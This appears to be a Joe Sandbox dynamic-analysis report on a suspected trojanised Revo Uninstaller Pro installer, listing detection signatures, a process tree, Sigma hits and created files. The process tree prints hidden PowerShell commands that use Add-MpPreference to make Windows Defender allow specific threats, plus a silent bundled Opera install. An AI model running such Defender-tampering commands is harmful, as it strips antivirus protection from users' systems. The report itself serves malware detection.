Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Revo.Uninstaller.Pro.v5.3.4.exe

Overview

General Information

Sample name:Revo.Uninstaller.Pro.v5.3.4.exe
Analysis ID:1571786
MD5:881464f03502d44e29e5fea8b4c35538
SHA1:8d2337cd5d72f43415e1d8ffb352a85d3374dd1c
SHA256:2a789deb64dd90261f2833d4da0d9f617f2a37ce49ecfa085f5dd43725795a1f
Tags:exeuser-Bacn
Infos:

Detection

Score:44
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Loading BitLocker PowerShell Module
Possible COM Object hijacking
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Classes Autorun Keys Modification
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: Suspicious Rundll32 Setupapi.dll Activity
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Revo.Uninstaller.Pro.v5.3.4.exe (PID: 7668 cmdline: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe" MD5: 881464F03502D44E29E5FEA8B4C35538)
    • rundll32.exe (PID: 8032 cmdline: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf MD5: EF3179D498793BF4234F708D3BE28633)
      • runonce.exe (PID: 8060 cmdline: "C:\Windows\system32\runonce.exe" -r MD5: 9ADEF025B168447C1E8514D919CB5DC0)
        • grpconv.exe (PID: 8096 cmdline: "C:\Windows\System32\grpconv.exe" -o MD5: 8531882ACC33CB4BDC11B305A01581CE)
    • regsvr32.exe (PID: 7288 cmdline: regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • RevoUninPro.exe (PID: 7340 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc MD5: EE15BFE5A394ADBFB087B053A6A72821)
    • ruplp.exe (PID: 712 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT MD5: 216B49B7EB7BE44D7ED7367F3725285F)
    • RevoUninPro.exe (PID: 1244 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" MD5: EE15BFE5A394ADBFB087B053A6A72821)
    • cmd.exe (PID: 916 cmdline: cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PACK.EXE (PID: 7620 cmdline: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123 MD5: A868E9C0A97C2EF80602C0F6634913F8)
        • powershell.exe (PID: 7516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ya.exe (PID: 5320 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe" MD5: 7ACCFDE96C04320BA099144A7BE710CC)
          • OperaSetup.exe (PID: 660 cmdline: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0 MD5: 43D37A6E0FE6E9824DFD80221E6AAD13)
            • setup.exe (PID: 3532 cmdline: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --silent --allusers=0 --server-tracking-blob=NWM4YWUzOWQyNTkwZGNkMDZiZDFlODcxMDg5YWFhOTYzNGRjMWI4Njg0MWE5OGMxZDBhOGNkY2I2N2FlOTg3ZTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MjM5OC4xNDI4IiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6IjVlOWNkMGQ0LWE0NjMtNDMxNy05NTg0LTU2ZDIwN2Y0ZWE3NCJ9 MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 6032 cmdline: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 8092 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRjMGY4Zjk2MzM2NDEwODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYyMzk4LjE0MjgiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiNWU5Y2QwZDQtYTQ2My00MzE3LTk1ODQtNTZkMjA3ZjRlYTc0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000 MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
                • setup.exe (PID: 7196 cmdline: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
  • ruplp.exe (PID: 5116 cmdline: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding MD5: 216B49B7EB7BE44D7ED7367F3725285F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000000.1735791667.0000000000401000.00000020.00000001.01000000.0000000F.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      9.0.ruplp.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine|base64offset|contains: z%, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123, ParentImage: C:\Users\user\AppData\Local\Temp\PACK.EXE, ParentProcessId: 7620, ParentProcessName: PACK.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", ProcessId: 7516, ProcessName: powershell.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\regsvr32.exe, ProcessId: 7288, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\(Default)
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: grpconv -o, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\rundll32.exe, ProcessId: 8032, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv
        Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, CommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, CommandLine|base64offset|contains: [HZ, Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe", ParentImage: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe, ParentProcessId: 7668, ParentProcessName: Revo.Uninstaller.Pro.v5.3.4.exe, ProcessCommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, ProcessId: 8032, ProcessName: rundll32.exe
        Source: Process startedAuthor: Konstantin Grishchenko, oscd.community: Data: Command: "C:\Windows\system32\runonce.exe" -r, CommandLine: "C:\Windows\system32\runonce.exe" -r, CommandLine|base64offset|contains: , Image: C:\Windows\System32\runonce.exe, NewProcessName: C:\Windows\System32\runonce.exe, OriginalFileName: C:\Windows\System32\runonce.exe, ParentCommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 8032, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\system32\runonce.exe" -r, ProcessId: 8060, ProcessName: runonce.exe
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, CommandLine: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, NewProcessName: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, OriginalFileName: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, ProcessId: 5116, ProcessName: ruplp.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine|base64offset|contains: z%, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123, ParentImage: C:\Users\user\AppData\Local\Temp\PACK.EXE, ParentProcessId: 7620, ParentProcessName: PACK.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", ProcessId: 7516, ProcessName: powershell.exe
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\tsjtmfdm[1].pkgReversingLabs: Detection: 29%
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEReversingLabs: Detection: 29%
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeReversingLabs: Detection: 25%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
        Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo GroupJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller ProJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\VistaJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10Jump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txtJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Revo Uninstaller Pro Help.pdfJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\reg_lp.batJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\rupilogs.rupldbJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\langJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\Estonian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\albanian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\arabic.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\armenian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\azerbaijani.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bengali.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bulgarian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\danish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\finnish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\french.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\german.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\gujarati.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hebrew.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hellenic.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hindi.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hrvatski.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hungarian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\indonesian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\italiano.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\japanese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\korean.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\kurdish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\macedonian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\norwegian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\persian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\polish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese_standard.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguesebrazil.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\romanian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbianLatin.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\simplifiedchinese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovak.iniJump to behavior
